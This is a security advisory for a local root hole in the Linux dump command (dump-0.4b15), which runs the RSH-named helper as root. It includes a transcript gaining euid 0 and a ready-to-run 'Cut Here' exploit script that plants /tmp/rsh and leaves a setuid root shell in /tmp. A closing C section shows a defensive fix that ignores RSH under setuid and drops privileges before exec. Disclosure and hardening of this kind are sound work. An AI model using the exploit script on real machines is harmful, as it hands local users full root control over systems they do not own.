1. Problem:

   The Linux dump command executes an external program with setuid root
   privilege. When TAPE names a remote target (host:file), dump runs the
   program named by the RSH environment variable to reach that host, and it
   does so without dropping its root privileges. Because RSH is under the
   caller's control, any local user can have root run a program of their
   choice.

2. Tested Version:

   dump-0.4b15

3. Example:

   [mat@localhost mat]$ export TAPE=garbage:garbage
   [mat@localhost mat]$ export RSH=/home/mat/execute_this
   [mat@localhost mat]$ cat > /home/mat/execute_this
   #!/bin/sh
   cp /bin/sh /home/mat/sh
   chmod 4755 /home/mat/sh
   [mat@localhost mat]$ chmod 755 /home/mat/execute_this
   [mat@localhost mat]$ /sbin/dump -0 /
     DUMP: Connection to garbage established.
     DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
     DUMP: Date of last level 0 dump: the epoch
     DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
     DUMP: Label: none
   /dev/hda2: Permission denied while opening filesystem
   [mat@localhost mat]$ ls -la /home/mat/sh
   -rwsr-xr-x   1 root     tty        316848 Oct 31 14:38 /home/mat/sh
   [mat@localhost mat]$ /home/mat/sh
   bash# id
   uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

   The dump itself fails (the filesystem open is refused), but the RSH
   helper has already been run as root, so the setuid copy of /bin/sh is
   left behind regardless.

=================================================
|                                               |
|               mat@hacksware.com               |
|                                               |
=================================================

---------Cut Here----------
#!/bin/sh
# Redhat 6.2 dump command executes external program
# with suid privilege.
# Discovered by Mat
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE

echo "dump-0.4b15 root exploit"
echo "Discovered by Mat "
echo "-------------------------------------"
echo

DUMP=/sbin/dump

# The bug is only reachable if dump is installed setuid.
if [ ! -u $DUMP ]; then
        echo "$DUMP is NOT setuid on this system or does not exist at all!"
        echo
        exit 0
fi

# A remote (host:file) TAPE target makes dump run $RSH; point RSH at our script.
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh

# The helper dump will run as root: it just drops a setuid copy of /bin/sh.
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
__eof__

chmod 755 /tmp/rsh
/sbin/dump -0 /

echo
echo "Waiting for rootshell .... 5 seconds...."
sleep 5

# Interactive root shell; 'id' runs after it exits.
/tmp/sush
id
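The defensive side of this, as an added example that is not dump's own code and not the fix the dump project shipped: a setuid program that lets the caller name a helper program should refuse the environment override whenever it is running with borrowed privilege (real and effective ids differ), and should in any case fork, drop privileges irrevocably in the child, and only then exec the helper. The function names, the /usr/bin/rsh default and the use of `sh -c` as a stand-in for a real rsh are assumptions for the demonstration; the ids 500/0 mirror the advisory's session.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define DEFAULT_RSH "/usr/bin/rsh"   /* assumed default; not dump's actual value */

/* The policy the advisory describes: whatever RSH names is what gets run,
 * regardless of who the process is running as. */
const char *pick_rsh_unsafe(const char *env_rsh)
{
    return (env_rsh && *env_rsh) ? env_rsh : DEFAULT_RSH;
}

/* Hardened policy: only honour RSH when real and effective ids match, i.e.
 * when the program is not running with setuid/setgid privilege. */
const char *pick_rsh_safe(const char *env_rsh,
                          uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    if (uid != euid || gid != egid)
        return DEFAULT_RSH;          /* privileged: ignore the environment */
    return pick_rsh_unsafe(env_rsh);
}

/* Permanently drop to the real uid/gid. Returns 0 only if the drop is
 * verified and cannot be undone. gid first, while the euid is still root. */
int drop_privs(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;
    if (geteuid() != uid || getegid() != gid) return -1;
    if (uid != 0 && setuid(0) == 0) return -1;   /* must fail after a real drop */
    return 0;
}

/* Run the helper with the caller's own privileges: fork, drop in the child,
 * then exec. Returns the child's exit status, or -1 on error. */
int spawn_helper_unprivileged(const char *prog, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privs() != 0) _exit(126);
        execv(prog, argv);
        _exit(127);                  /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Convenience wrapper: run `sh -c CMD` unprivileged and return its status. */
int run_sh_unprivileged(const char *cmd)
{
    char *argv[] = { "/bin/sh", "-c", (char *)cmd, NULL };
    return spawn_helper_unprivileged("/bin/sh", argv);
}

int main(void)
{
    /* Constructed input mirroring the advisory: attacker-controlled RSH,
     * process running as uid 500 with euid 0. */
    const char *attacker_rsh = "/home/mat/execute_this";
    printf("unsafe choice: %s\n", pick_rsh_unsafe(attacker_rsh));
    printf("safe choice:   %s\n", pick_rsh_safe(attacker_rsh, 500, 0, 500, 500));

    /* Stand-in for the rsh helper: show which ids the child really runs with. */
    int rc = run_sh_unprivileged("id");
    printf("helper exited with %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

The two checks complement each other: refusing RSH while setuid closes the path the advisory uses, and dropping privileges in the child before exec means that even a helper chosen from a trusted location cannot inherit root if it is later compromised or replaced. Verify the drop rather than trusting setuid()'s return alone; a setuid() that silently leaves the saved uid at 0 is recoverable by the child.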